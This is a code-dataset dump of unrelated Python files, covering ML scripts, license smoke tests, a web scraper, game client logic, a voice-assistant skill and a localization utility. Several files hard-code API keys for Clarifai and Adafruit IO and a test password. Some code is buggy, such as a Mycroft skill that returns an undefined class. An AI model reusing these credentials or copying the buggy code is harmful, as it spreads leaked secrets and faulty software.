print(statistics.mean(mediandifferences), statistics.stdev(mediandifferences))\n print(statistics.mean(meandifferences), statistics.stdev(meandifferences))\n\n\nnumber_of_cars = 10\nnumber_of_centroids = 5\nget_stats(number_of_centroids, number_of_cars)","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"445454638","text":"# -*- coding: utf-8 -*-\nfrom setuptools import setup\n\nrequirements = [\n 'flask',\n 'python-dotenv',\n # 'flask-simplelogin'​,\n # 'flask-admin'​,\n # 'flask-wtf'​,\n # 'flask-restful'​,\n # 'flask-pytest'​,\n # 'flask-bootstrap'​,\n # 'flasgger'\n]\n\n\nsetup(\n name='cms',\n version='1.0.0',\n description='Colaborasol CMS',\n packages=['webapp'],\n include_package_data=True,\n install_requires=requirements\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"73579906","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import SVC\n\ndata = np.genfromtxt('chips.txt', delimiter=',')\nX, y = np.hsplit(data, [-1])\ndata_train = np.vstack((data[0:47, :], data[58:107, :]))\ndata_test = np.vstack((data[48:57, :], data[108:117, :]))\nX_train, y_train = np.hsplit(data_train, [-1])\nX_test, y_test = np.hsplit(data_test, [-1])\n(y, y_train, y_test) = (y.ravel(), y_train.ravel(), y_test.ravel())\n\n# A common classifier to which we'll set optimal params\nclf = SVC()\n\n\ndef svc_param_selection(X, y):\n param_grid = [\n {\n 'kernel': ['linear'],\n 'C': [0.001, 0.01, 0.1, 1, 10]\n },\n {\n 'kernel': ['poly', 'rbf', 'sigmoid'],\n 'C': [0.001, 0.01, 0.1, 1, 10],\n 'gamma': [0.001, 0.01, 0.1, 1]\n }\n ]\n grid_search = GridSearchCV(estimator=clf, param_grid=param_grid, cv=3)\n grid_search.fit(X, y)\n return grid_search.best_params_\n\n\n# Calculate best parameters for SVC using GridSearchCV\nbest_params = svc_param_selection(X, y)\nprint(f\"best params: {best_params}\")\n\n# Fit the model using best params and predict\nclf.set_params(**best_params)\nclf.fit(X_train, y_train)\npred_train = clf.predict(X_train)\npred_test = clf.predict(X_test)\n\n# Calculate metrics\n(precision_train, recall_train, _, _) = \\\n precision_recall_fscore_support(y_true=y_train, y_pred=pred_train, average='binary')\n(precision_test, recall_test, _, _) = \\\n precision_recall_fscore_support(y_true=y_test, y_pred=pred_test, average='binary')\nprint(f\"precision_train:\\t{precision_train:5f}, recall_train:\\t{recall_train:5f}\")\nprint(f\"precision_test:\\t\\t{precision_test:5f}, recall_test:\\t{recall_test:5f}\")\n\n# Print results on a plot\n# Test data elements will be circled out\nplt.scatter(X[:, 0], X[:, 1], c=y, zorder=10, cmap=plt.cm.Paired, edgecolor='k', s=20)\nplt.scatter(X_test[:, 0], X_test[:, 1], s=80, facecolors='none', zorder=10, edgecolor='k')\n\n# Draw separating plane on a colored layout\nplt.axis('tight')\nx_min = X[:, 0].min()\nx_max = X[:, 0].max()\ny_min = X[:, 1].min()\ny_max = X[:, 1].max()\nXX, YY = np.mgrid[x_min:x_max:200j, y_min:y_max:200j]\nZ = clf.decision_function(np.c_[XX.ravel(), YY.ravel()])\nZ = Z.reshape(XX.shape)\nplt.contour(XX, YY, Z, colors=['k', 'k', 'k'], linestyles=['--', '-', '--'], levels=[-.5, 0, .5])\nplt.pcolormesh(XX, YY, Z > 0, cmap=plt.cm.Paired)\n\nplt.show()\n","sub_path":"task2/task2_svm.py","file_name":"task2_svm.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"388572917","text":"from vastestcase import *\n\nfrom user import User\n\nclass licenseTests(VasTestCase):\n \"\"\"License Test\n Author: Chris Saxey\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.tempDirectory = '/tmp/lic/'\n cls.licenseDirectory = '/etc/opt/quest/vas/.licenses/'\n cls.validLicenseName = '{}VAS_license_123-45680'.format(cls.licenseDirectory)\n cls.invalidLicenseName = '/tmp/VAS_license_123-45680'\n cls.masterList = []\n cls.masterList.append({'License': '/etc/opt/quest/vas/.licenses/license2.txt', \n 'Status': 'Valid License', 'Servers': '0', 'Users': '10', 'Expiration Date': 'Never'})\n cls.masterList.append({'License': '/etc/opt/quest/vas/.licenses/license5.txt', \n 'Status': 'Valid License', 'Servers': '0', 'Users': '5000', 'Expiration Date': 'Never'})\n cls.computer.remoteShell.run('mkdir {}'.format(cls.tempDirectory))\n \n def test_01_TestForValidLicense(self):\n \"\"\"Check for a valid license\n Purpose: Checks for a valid license\n Tags: license\n Requirements: QAS is installed\n Component: License\n \n Steps:\n 1. Install desired version of QAS; Should install without any errors \n 2. Check for licenses: /opt/quest/bin/vastool -u Administrator@A.SB -w {password} license -i; Should valid licenses\n \"\"\" \n output, returnCode, licenses = self.computer.vastool.License(licenseOptions='-i')\n self.assertTrue(returnCode)\n success = False\n for lic in licenses:\n if lic['License'] == self.validLicenseName:\n self.assertEqual(lic['Status'], 'Valid License')\n self.assertEqual(lic['Servers'], '10')\n self.assertEqual(lic['Users'], '10')\n success = True\n self.assertTrue(success)\n \n def test_02_TestForInvalidLicense(self):\n \"\"\"Check for an invalid license\n Purpose: Checks for an invalid license\n Tags: license\n Requirements: QAS is installed\n Component: License\n \n Steps:\n 1. Install desired version of QAS; Should install without any errors \n 2. Move the license files to tmp; We need to move them so they dont show up\n 3. mv /etc/opt/quest/vas/.licenses/VAS_license_123-45680 /tmp/VAS_license_123-45680; Should not complain\n 4. Create a bad file: sed \"s/Users: 5000/Users: 9000/\" /etc/opt/quest/vas/.licenses/VAS_license_123-45680 > /etc/opt/quest/vas/.licenses/VAS_license_123-45680; should create a bad file \n 5. Check again: /opt/quest/bin/vastool -u Administrator@A.SB -w {password} license -i; Should show no valid licenses are installed\n \"\"\" \n self.assertEqual(self.computer.remoteShell.run('mv {} {}'.format(self.validLicenseName, \n self.invalidLicenseName)), 0)\n self.assertEqual(self.computer.remoteShell.run('rm -f {}*'.format(self.licenseDirectory)), 0)\n self.assertEqual(self.computer.remoteShell.run('mv {} {}'.format(self.invalidLicenseName, \n self.validLicenseName)), 0)\n self.assertEqual(self.computer.remoteShell.run('sed \"s/Users: 5000/Users: 9000/\" {} > {}'.format(\n self.validLicenseName, self.validLicenseName)), 0)\n output, returnCode, licenses = self.computer.vastool.License(licenseOptions='-i')\n self.assertTrue(returnCode, 'Failed to run vastool license')\n self.assertGreater(output.find('---QAS ---\\r\\nNo valid licenses are installed'), -1)\n \n def test_03_TestAllLicenses(self):\n \"\"\"Check all licenses\n Purpose: Check all licenses\n Tags: license\n Requirements: QAS is installed\n Component: License\n \n Steps:\n 1. Install desired version of QAS; Should install without any errors \n \"\"\" \n halYa = User(password='auto123')\n self.assertTrue(self.computer.remoteShell.run(\"rm -f /etc/opt/quest/vas/.licenses/*\") == 0, \n 'Failed to remove all licenses')\n self.assertTrue(self.computer.scp(\"hal9000.vintela.com:/automation/cvs/DEV/vasqa/misc/licenses/*.*\",\n \"/etc/opt/quest/vas/.licenses/\", halYa), 'Failed to copy licenses')\n output, returnCode, licenses = self.computer.vastool.License(licenseOptions='-i')\n self.assertTrue(returnCode, 'Failed to run vastool license')\n diff = self.computer.vastool.compareLicenses(self.masterList, licenses)\n for d in diff:\n self.logger.error('{} did not contain {}'.format(d[0], d[1]))\n self.fail('Licenses were not read as expected')\n\n @classmethod\n def tearDownClass(cls):\n cls.computer.remoteShell.run(\"rm -rf {}\".format(cls.tempDirectory))\n","sub_path":"smokeTests/test_licenseTests.py","file_name":"test_licenseTests.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"591577319","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom scrapy.exceptions import DropItem\n\nclass LeetcodespiderPipeline(object):\n\tlang = [' c ', ' c++ ', ' C++ ', 'c ', 'c++ ', 'C++ ']\n\tdef process_item(self, item, spider):\n\t\tfor l in self.lang:\n\t\t\tif l in item['answer']['title']:\n\t\t\t\titem['answer']['lang'] = l.strip().upper()\n\t\t\t\treturn item\n\t\t\telse:\n\t\t\t\traise DropItem(\"Not target language\")\n","sub_path":"Spider/leetcodeSpider/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"391988166","text":"from clarifai.rest import ClarifaiApp, client, Image\nimport pprint\n\ndef img_has_cat(filename):#url):\n app = ClarifaiApp(api_key=\"ee15b61906ee4423b5c9bea34977228d\")\n model = app.models.get(\"general-v1.3\")\n \n try:\n image = Image(file_obj=open(filename, 'rb'))\n #result = model.predict_by_url(url=url)\n result = model.predict([image])\n try:\n items = result['outputs'][0]['data']['concepts']\n for item in items:\n if item['name'] == 'cat':\n return True\n else:\n return False\n except (IndexError):\n return False\n except (client.ApiError):\n return False\n \nif __name__ == \"__main__\":\n #print(img_has_cat(\"http://www.catster.com/wp-content/uploads/2017/08/A-fluffy-cat-looking-funny-surprised-or-concerned.jpg\"))\n #print(img_has_cat(\"http://images2.fanpop.com/image/photos/11700000/Catwomen-3-catwomen-11767352-600-900.jpg\"))\n #print(img_has_cat(\"http://images2.fanpop.com/image/photos/11700000/Catwomen-3-catwomen-11\"))\n print(img_has_cat(\"cats/cat1.jpg\"))\n\n \n #pp = pprint.PrettyPrinter(indent=2)\n #print(result)\n #pp.pprint(result['outputs'][0]['data']['concepts'])","sub_path":"cat_checker.py","file_name":"cat_checker.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"20412288","text":"import sys\nimport os\nfrom game.common.enums import *\nfrom game.common.node_types import get_node\nfrom game.common.unit_classes import get_unit\nfrom game.common.monster_types import get_monster\nfrom game.common.trap_types import get_trap\n\nimport sys\n\nclass ClientStorefront:\n def __init__(self, turn_data):\n self.items = turn_data[\"items\"]\n self.purchases = []\n self.town_number = turn_data[\"town_number\"]\n\n def get_town_number(self):\n return self.town_number\n\n\n def purchase(self, unit, item, item_level, item_slot=None):\n if item_slot:\n self.purchases.append( {\n \"unit\": unit.id,\n \"slot\": item_slot,\n \"item\": item,\n \"item_level\": item_level\n } )\n else:\n self.purchases.append( {\n \"unit\": unit.id,\n \"item\": item,\n \"item_level\": item_level\n } )\n\n def get_return_data(self):\n return {\n \"message_type\": MessageType.town,\n \"purchases\": self.purchases\n }\n\nclass ClientLogic:\n\n def __init__(self, verbose, player_client):\n self._loop = None\n self._socket_client = None\n self.verbose = verbose\n self.player_client = player_client\n\n # check to see if the client defiens the quit_in_game_over variable\n self.quit_on_game_over = getattr(self.player_client, \"quit_on_game_over\", True)\n\n # Public properties availiable to users\n\n self.started_game = False\n self.tick_no = 0\n\n def set_loop(self, loop):\n self._loop = loop\n\n def set_socket_client(self, socket_client):\n self._socket_client = socket_client\n\n def initialize(self):\n\n self.send({\n \"type\": \"register\"\n })\n\n def tick(self, turn_data):\n self.tick_no += 1\n\n turn_data = self.deserialize(turn_data)\n\n try:\n turn_result = self.turn(turn_data)\n except Exception as e:\n print()\n print(\"Exception:\")\n print(e)\n sys.exit(1)\n\n serialized_turn_result = self.serialize(turn_result)\n\n self.send({\n \"type\": \"client_turn\",\n \"payload\": serialized_turn_result\n })\n\n def turn(self, turn_data):\n\n if turn_data[\"message_type\"] == MessageType.unit_choice:\n team_name = self.player_client.team_name()\n choices = self.player_client.unit_choice()\n return {\n \"message_type\": MessageType.unit_choice,\n \"team_name\": team_name,\n \"units\": choices\n }\n\n elif turn_data[\"message_type\"] == MessageType.town:\n units = turn_data[\"units\"]\n gold = turn_data[\"gold\"]\n store = ClientStorefront(turn_data)\n self.player_client.town(units, gold, store)\n return store.get_return_data()\n\n elif turn_data[\"message_type\"] == MessageType.room_choice:\n units = turn_data[\"units\"]\n options = turn_data[\"options\"]\n options = { int(k):v for k, v in options.items() }\n direction = self.player_client.room_choice(units, options)\n return { \"message_type\": MessageType.room_choice, \"choice\": direction }\n\n elif turn_data[\"message_type\"] == MessageType.combat_round:\n monster = turn_data[\"monster\"]\n units = turn_data[\"units\"]\n self.player_client.combat_round(monster, units)\n return { \"message_type\": MessageType.combat_round, \"units\": units }\n\n elif turn_data[\"message_type\"] == MessageType.trap_round:\n trap = turn_data[\"trap\"]\n units = turn_data[\"units\"]\n self.player_client.trap_round(trap, units)\n return {\"message_type\": MessageType.trap_round, \"units\": units}\n\n def send(self, data):\n self._socket_client.send(data)\n\n def notify_game_started(self):\n if self.verbose:\n print(\"Game Started\")\n self.started_game = True\n\n def deserialize(self, turn_data):\n\n # load units\n units = []\n if \"units\" in turn_data:\n for u in turn_data[\"units\"]:\n new_unit = get_unit(u[\"unit_class\"])\n new_unit.from_dict(u)\n units.append(new_unit)\n\n turn_data[\"units\"] = units\n\n # load message type specific data\n if turn_data[\"message_type\"] == MessageType.room_choice:\n # deserialize rooms\n for direction, room in turn_data[\"options\"].items():\n new_room = get_node(room[\"node_type\"])\n new_room.from_dict(room)\n turn_data[\"options\"][direction] = new_room\n\n elif turn_data[\"message_type\"] == MessageType.combat_round:\n # deserialize monster\n monster = get_monster(turn_data[\"monster\"][\"monster_type\"])\n monster.from_dict(turn_data[\"monster\"])\n turn_data[\"monster\"] = monster\n\n elif turn_data[\"message_type\"] == MessageType.trap_round:\n # deserialize trap\n trap = get_trap(turn_data[\"trap\"][\"trap_type\"])\n trap.from_dict(turn_data[\"trap\"])\n turn_data[\"trap\"] = trap\n\n return turn_data\n\n def serialize(self, turn_result):\n\n if turn_result[\"message_type\"] == MessageType.combat_round:\n serialized_units = []\n\n for u in turn_result[\"units\"]:\n serialized_units.append( u.to_dict() )\n\n turn_result[\"units\"] = serialized_units\n\n elif turn_result[\"message_type\"] == MessageType.trap_round:\n serialized_units = []\n\n for u in turn_result[\"units\"]:\n serialized_units.append( u.to_dict() )\n\n turn_result[\"units\"] = serialized_units\n\n\n return turn_result\n\n def notify_game_over(self):\n if callable(getattr(self.player_client, \"game_over\", None)):\n self.player_client.game_over()\n\n if self.quit_on_game_over:\n exit()\n\n\n\n","sub_path":"game/client/client_logic.py","file_name":"client_logic.py","file_ext":"py","file_size_in_byte":6057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"408732052","text":"from .._tier0 import Image\n\ndef imshow(image : Image, title : str = None, labels : bool = False, min_display_intensity : float = None, max_display_intensity : float = None, color_map = None, plot = None):\n from .._tier0 import pull\n from .._tier1 import maximum_z_projection\n\n if len(image.shape) == 3:\n image = maximum_z_projection(image)\n\n image = pull(image)\n\n cmap = color_map\n if labels:\n import matplotlib\n import numpy as np\n \n lut = np.random.rand ( 256,3)\n lut[0,:] = 0\n cmap = matplotlib.colors.ListedColormap ( lut )\n\n if plot is None:\n import matplotlib.pyplot as plt\n plt.imshow(image, cmap=cmap, vmin=min_display_intensity, vmax=max_display_intensity, interpolation='nearest')\n plt.show()\n else:\n plot.imshow(image, cmap=cmap, vmin=min_display_intensity, vmax=max_display_intensity, interpolation='nearest')\n\n","sub_path":"pyclesperanto_prototype/_tier9/_imshow.py","file_name":"_imshow.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"299445863","text":"import sys\nfrom mycroft import MycroftSkill, intent_file_handler\nfrom Adafruit_IO import MQTTClient\n\nADAFRUIT_IO_KEY = 'aio_zaSA378nNDu9vnMPcq5IpcfBWyNn'\nADAFRUIT_IO_USERNAME = 'Kenzo16'\n\nclient = MQTTClient(ADAFRUIT_IO_USERNAME, ADAFRUIT_IO_KEY)\nclient.connect()\nclient.loop_background()\n\n\nclass Lamb1Control(MycroftSkill):\n def __init__(self):\n MycroftSkill.__init__(self)\n @intent_file_handler('lamb1.control.intent')\n def handle_jarvis_introducing(self, message):\n self.speak_dialog('lamb1.control')\n client.publish('Lamb1', 1)\n\n\ndef create_skill():\n return FanControl()\n\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"166770516","text":"from bs4 import BeautifulSoup\nimport requests\n\n\nuserName = 'C9 Meteos'# crakyjoes, C9 Meteos, C9 Sneaky\nuserName = userName.replace(\" \", \"+\") # convention used by the website\nopGGUrl = 'http://na.op.gg/summoner/userName=' + userName\nwebHandle = requests.get(opGGUrl) # this is in bytes\ndecodeHtml = webHandle.content.decode(\"utf-8\", \"ignore\") #removes unnecesary unicode-symbols\nsoup = BeautifulSoup(decodeHtml, \"html5lib\") #build bs4.elements.tag using html5liblib parser\n\n#print (dir(soup))\n#print (decodeHtml)\n#print (webHandle.text)\n\n\n#Gathering stats of \ngameList = soup.find_all(\"div\", class_=\"GameItemWrap\")\nfor gNum in range (0,len(gameList)):\n#gNum = 8\n gameType = (gameList[gNum].find(\"div\", class_=\"GameType\")).string\n gameResult = (gameList[gNum].find(\"div\", class_=\"GameResult\")).string.strip()\n gameLength = (gameList[gNum].find(\"div\", class_=\"GameLength\")).string.strip()\n championPlayed = (gameList[gNum].find(\"div\", class_=\"ChampionName\")).a.string.strip()\n kills = int((gameList[gNum].find(\"span\", class_=\"Kill\")).string.strip())\n deaths = int((gameList[gNum].find(\"span\", class_=\"Death\")).string.strip())\n assists = int((gameList[gNum].find(\"span\", class_=\"Assist\")).string.strip())\n csNums = (gameList[gNum].find(\"span\", class_=\"CS tip\")).string.strip()\n gameDate = (gameList[gNum].find(\"div\", class_=\"TimeStamp\")).string.strip()\n killPart = (gameList[gNum].find(\"div\", class_=\"CKRate\")).string.strip()\n summonerSpells = (gameList[gNum].find_all(\"div\", class_=\"Spell\"))\n\n if(deaths == 0):\n KDA = (kills + assists)/(deaths+1)\n else:\n KDA = (kills + assists)/(deaths)\n\n try:\n multikill = (gameList[gNum].find(\"div\", class_=\"MultiKill\")).span.string.strip()\n except:\n multikill = \"None\"\n\n#Create a list of 2 teams\n playersHTMLList = (gameList[gNum].find_all(\"div\", class_=\"Team\"))\n teamsCombined = []\n team = []\n\n for i in range(0, len(playersHTMLList)):\n summoners = playersHTMLList[i].find_all(\"div\", class_=\"Summoner\")\n for player in summoners: #extract 2 teams separately\n team.append(player.div.div.string)\n\n teamsCombined.append(team) #[list_of_team1, list_of_team2]\n team = [] #empty this list to re-use it to fill players from team 2\n\n\n #Print the gathered information\n print (\"Game-Number: \", gNum+1)\n print (\"GameType: \", gameType)\n print (\"GameResult: \", gameResult)\n print (\"GameLength: \", gameLength)\n print (\"championPlayed: \", championPlayed)\n print (\"Kill: \", kills)\n print (\"Death: \", deaths)\n print (\"Assist: \", assists)\n print (\"KDA: \", \"{0:.3f}\".format(KDA))\n print (\"csNums :\", csNums)\n print (\"MultiKill: \", multikill)\n print (\"GameDate: \", gameDate)\n print (\"SummonerSpells: \", summonerSpells[0].img['alt'], summonerSpells[1].img['alt'])\n print (\"Kill Participation: \", killPart)\n print (\"TeamList: \", teamsCombined)\n print (\"--------------------------------------------------\")\n","sub_path":"opGG/py3opGG.py","file_name":"py3opGG.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"260654057","text":"import unittest\nfrom collections import OrderedDict\nfrom mock import Mock\n\nfrom malcolm.core import Table\nfrom malcolm.modules.builtin.vmetas import NumberArrayMeta, StringArrayMeta\n\n\nclass TestTableInit(unittest.TestCase):\n def test_init(self):\n meta = Mock()\n s = StringArrayMeta()\n meta.elements = {\"e1\":s, \"e2\":s, \"e3\":s}\n t = Table(meta)\n assert () == t.e1\n assert () == t.e2\n assert () == t.e3\n assert \"malcolm:core/Table:1.0\" == t.typeid\n\n def test_init_with_dict(self):\n meta = Mock()\n meta.elements = {\"e1\": NumberArrayMeta(\"int32\"),\n \"e2\": StringArrayMeta(),\n \"e3\": StringArrayMeta()}\n d = {\"e1\":[0, 1], \"e3\":[\"value\"]}\n t = Table(meta, d)\n assert [0, 1] == list(t.e1)\n assert () == t.e2\n assert (\"value\",) == t.e3\n assert \"malcolm:core/Table:1.0\" == t.typeid\n\n def test_init_with_none(self):\n meta = Mock()\n meta.elements = {\"e1\": StringArrayMeta()}\n t = Table(meta, None)\n assert () == t.e1\n assert \"malcolm:core/Table:1.0\" == t.typeid\n\n\nclass TestTableRowOperations(unittest.TestCase):\n def setUp(self):\n meta = Mock()\n meta.elements = OrderedDict()\n meta.elements[\"e1\"] = NumberArrayMeta(\"int32\")\n meta.elements[\"e2\"] = NumberArrayMeta(\"int32\")\n meta.elements[\"e3\"] = NumberArrayMeta(\"int32\")\n self.t = Table(meta)\n self.t.e1 = [1]\n self.t.e2 = [2]\n self.t.e3 = [3]\n\n def test_row_access(self):\n assert [1, 2, 3] == self.t[0]\n\n def test_string_access(self):\n assert self.t.e1 == self.t[\"e1\"]\n assert self.t.e2 == self.t[\"e2\"]\n\n def test_string_setters(self):\n self.t[\"e2\"] = [4]\n assert list(self.t.e2) == [4]\n\n def test_row_access_index_error(self):\n with self.assertRaises(IndexError):\n self.t[1]\n self.t.e1 = [1, 11]\n self.t.e2 = [2, 12]\n self.t.e3 = [3, 13]\n self.t[1]\n with self.assertRaises(IndexError):\n self.t[2]\n\n def test_row_assignment(self):\n self.t[0] = [7, 8, 9]\n assert [7] == self.t.e1\n assert [8] == self.t.e2\n assert [9] == self.t.e3\n\n def test_row_assignment_bad_row_raises(self):\n with self.assertRaises(ValueError):\n self.t[0] = [7, 8]\n assert [1] == self.t.e1\n assert [2] == self.t.e2\n assert [3] == self.t.e3\n\n def test_row_assingment_index_error(self):\n with self.assertRaises(IndexError):\n self.t[1] = [7, 8, 9]\n\n def test_row_append(self):\n self.t.append([11, 12, 13])\n self.t.append([21, 22, 23])\n assert [1, 11, 21] == list(self.t.e1)\n assert [2, 12, 22] == list(self.t.e2)\n assert [3, 13, 23] == list(self.t.e3)\n\n def test_row_append_bad_row_raises(self):\n with self.assertRaises(ValueError):\n self.t.append([11, 12])\n with self.assertRaises(ValueError):\n self.t.append([11, 12, 13, 14])\n\n def test_bad_columns_raise(self):\n self.t.e1 = [1, 2]\n with self.assertRaises(AssertionError):\n self.t[0]\n with self.assertRaises(AssertionError):\n self.t[0] = [0, 0, 0]\n with self.assertRaises(AssertionError):\n self.t.append([0, 0, 0])\n\n\nclass TestTableMetaSerialization(unittest.TestCase):\n\n def setUp(self):\n meta = Mock()\n meta.elements = OrderedDict()\n meta.elements[\"e1\"] = StringArrayMeta()\n meta.elements[\"e2\"] = NumberArrayMeta(\"int32\")\n meta.elements[\"e3\"] = NumberArrayMeta(\"int32\")\n self.meta = meta\n\n def test_to_dict(self):\n t = Table(self.meta)\n t.e1 = [\"value\"]\n t.e2 = [1, 2]\n t.e3 = [0]\n\n expected = OrderedDict()\n expected[\"typeid\"] = \"malcolm:core/Table:1.0\"\n expected[\"e1\"] = [\"value\"]\n expected[\"e2\"] = [1, 2]\n expected[\"e3\"] = [0]\n actual = t.to_dict()\n # numpy compare gets in the way...\n for k, v in actual.items():\n if k != \"typeid\":\n actual[k] = list(v)\n assert expected == actual\n\n def test_from_dict(self):\n d = {\"e2\":[0, 1, 2], \"e1\":[\"value\"], \"e3\":[6, 7]}\n t = Table(self.meta, d)\n assert self.meta == t.meta\n assert [0, 1, 2] == list(t.e2)\n assert (\"value\",) == t.e1\n assert [6, 7] == list(t.e3)\n\n def test_dict_roundtrip(self):\n t = Table(self.meta)\n d = t.to_dict()\n d2 = d.copy()\n d2.pop(\"typeid\")\n t2 = Table(self.meta, d2)\n assert d == t2.to_dict()\n","sub_path":"tests/test_core/test_table.py","file_name":"test_table.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"388785260","text":"\nimport codecs\nimport commonware.log\nimport configparser\nimport datetime\nimport fnmatch\nimport operator\nimport os\nimport polib\nimport shutil\nimport silme.core\nimport silme.format.properties\nimport StringIO\nimport urllib2\nimport zipfile\n\nfrom django.conf import settings\nfrom django.utils.encoding import smart_text\nfrom pontoon.administration.utils.vcs import update_from_vcs\n\nfrom pontoon.base.models import (\n Entity,\n Locale,\n Project,\n ProjectForm,\n Resource,\n Stats,\n Subpage,\n Translation,\n UserProfile,\n get_translation,\n unset_approved,\n update_stats,\n)\n\nlog = commonware.log.getLogger('pontoon')\n\n\n\"\"\" Start monkeypatching \"\"\"\nfrom silme.core.structure import Structure, Comment\nfrom silme.format.properties.parser import PropertiesParser\n\n\n@classmethod\ndef split_comments_mine(\n cls, text, object, code='default', pointer=0, end=None):\n pattern = cls.patterns['comment']\n if end:\n match = pattern.search(text, pointer, end)\n else:\n match = pattern.search(text, pointer)\n while match:\n st0 = match.start(0)\n if st0 > pointer:\n cls.split_entities(\n text, object, code=code, pointer=pointer, end=st0)\n groups = match.groups()\n comment = silme.core.structure.Comment(\n match.group(0)[1:].replace('\\n#', '\\n'))\n object.append(comment)\n pointer = match.end(0)\n if end:\n match = pattern.search(text, pointer, end)\n else:\n match = pattern.search(text, pointer)\n if (not end or (end > pointer)) and len(text) > pointer:\n cls.split_entities(text, object, code=code, pointer=pointer)\n\nPropertiesParser.split_comments = split_comments_mine\n\n\ndef __repr__mine(self):\n string = ''\n for i in self:\n string += str(i)\n return string\n\nComment.__repr__ = __repr__mine\n\n\ndef modify_entity_mine(self, id, value, code=None):\n \"\"\"\n modifies entity value; supports duplicate keys\n code - if given modified the value for given locale code\n \"\"\"\n found = False\n for item in self:\n if isinstance(item, silme.core.entity.Entity) and item.id == id:\n item.set_value(value, code)\n found = True\n\n if found:\n return True\n else:\n raise KeyError('No such entity')\n\nStructure.modify_entity = modify_entity_mine\n\"\"\" End monkeypatching \"\"\"\n\n\ndef get_locale_paths(project, locale):\n \"\"\"Get paths to locale files.\"\"\"\n\n locale_paths = []\n path = get_locale_directory(project, locale)[\"path\"]\n\n for root, dirnames, filenames in os.walk(path):\n # Ignore hidden files and folders\n filenames = [f for f in filenames if not f[0] == '.']\n dirnames[:] = [d for d in dirnames if not d[0] == '.']\n\n for filename in fnmatch.filter(filenames, '*.' + project.format):\n locale_paths.append(os.path.join(root, filename))\n\n return locale_paths\n\n\ndef get_locale_directory(project, locale):\n \"\"\"\n Get path to the directory with locale files.\n\n Args:\n project: Project instance\n locale: Locale instance\n Returns:\n Dict with directory name and path as keys.\n \"\"\"\n\n path = get_repository_path_master(project)\n\n for root, dirnames, filenames in os.walk(path):\n # Ignore hidden files and folders\n filenames = [f for f in filenames if not f[0] == '.']\n dirnames[:] = [d for d in dirnames if not d[0] == '.']\n\n for dirname in fnmatch.filter(dirnames, locale.code):\n return {\n 'name': dirname,\n 'path': os.path.join(root, dirname),\n }\n\n # Also check for locale variants with underscore, e.g. de_AT\n for dirname in fnmatch.filter(dirnames, locale.code.replace('-', '_')):\n return {\n 'name': dirname,\n 'path': os.path.join(root, dirname),\n }\n\n # Projects not using locale directories (.ini, file)\n if project.format == 'ini' or project.repository_type == 'file':\n return {\n 'name': '',\n 'path': path,\n }\n\n log.error(\"Locale repository path not found.\")\n\n\ndef detect_format(path):\n \"\"\"Detect file format based on file extensions.\"\"\"\n\n for root, dirnames, filenames in os.walk(path):\n # Ignore hidden files and folders\n filenames = [f for f in filenames if not f[0] == '.']\n dirnames[:] = [d for d in dirnames if not d[0] == '.']\n\n for extension in ('pot', 'po', 'properties', 'ini', 'lang'):\n for filename in fnmatch.filter(filenames, '*.' + extension):\n return 'po' if extension == 'pot' else extension\n\n\ndef get_source_paths(path):\n \"\"\"Get paths to source files.\"\"\"\n\n source_paths = []\n\n for root, dirnames, filenames in os.walk(path):\n # Ignore hidden files and folders\n filenames = [f for f in filenames if not f[0] == '.']\n dirnames[:] = [d for d in dirnames if not d[0] == '.']\n\n for extension in ('pot', 'po', 'properties', 'ini', 'lang'):\n for filename in fnmatch.filter(filenames, '*.' + extension):\n source_paths.append(os.path.join(root, filename))\n\n return source_paths\n\n\ndef get_source_directory(path):\n \"\"\"Get name and path of the directory with source files.\"\"\"\n\n for root, dirnames, filenames in os.walk(path):\n # Ignore hidden files and folders\n filenames = [f for f in filenames if not f[0] == '.']\n dirnames[:] = [d for d in dirnames if not d[0] == '.']\n\n for directory in ('templates', 'en-US', 'en-GB', 'en'):\n for dirname in fnmatch.filter(dirnames, directory):\n source_directory_path = os.path.join(root, dirname)\n if detect_format(source_directory_path):\n return {\n 'name': dirname,\n 'path': source_directory_path,\n }\n\n # Projects not using locale directories (.ini, file)\n return {\n 'name': '',\n 'path': path,\n }\n\n\ndef get_repository_path_master(project):\n \"\"\"Get path to master project folder containing repository files.\"\"\"\n\n return os.path.join(\n settings.MEDIA_ROOT, project.repository_type, project.slug)\n\n\ndef get_relative_path(path, locale):\n \"\"\"Get relative path to repository file.\"\"\"\n\n locale_directory = locale.code\n if 'templates' in path:\n locale_directory = 'templates'\n\n # Also check for locale variants with underscore, e.g. de_AT\n underscore = locale.code.replace('-', '_')\n if '/' + underscore + '/' in path:\n locale_directory = underscore\n\n return path.split('/' + locale_directory + 